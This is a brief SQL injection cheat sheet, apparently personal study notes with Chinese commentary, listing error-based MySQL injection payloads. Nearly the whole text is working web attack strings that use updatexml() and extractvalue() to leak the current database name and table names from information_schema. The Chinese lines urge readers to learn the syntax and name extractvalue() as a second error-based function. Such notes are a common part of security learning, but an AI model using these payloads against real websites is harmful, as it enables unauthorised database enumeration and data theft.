-1' and updatexml(1,concat('~',database(),'~'),1) --+
-1' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema=database()limit 1,1),'~'),1) --+
-1' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema=database()limit 3,1),'~'),1) --+
下面的都可以按照上面的大家要学会语法
还有下面还有个拓展函数也是报错函数
extractvalue()
id = -1' and (extractvalue(1, concat(0x5c,(select database()))))--+
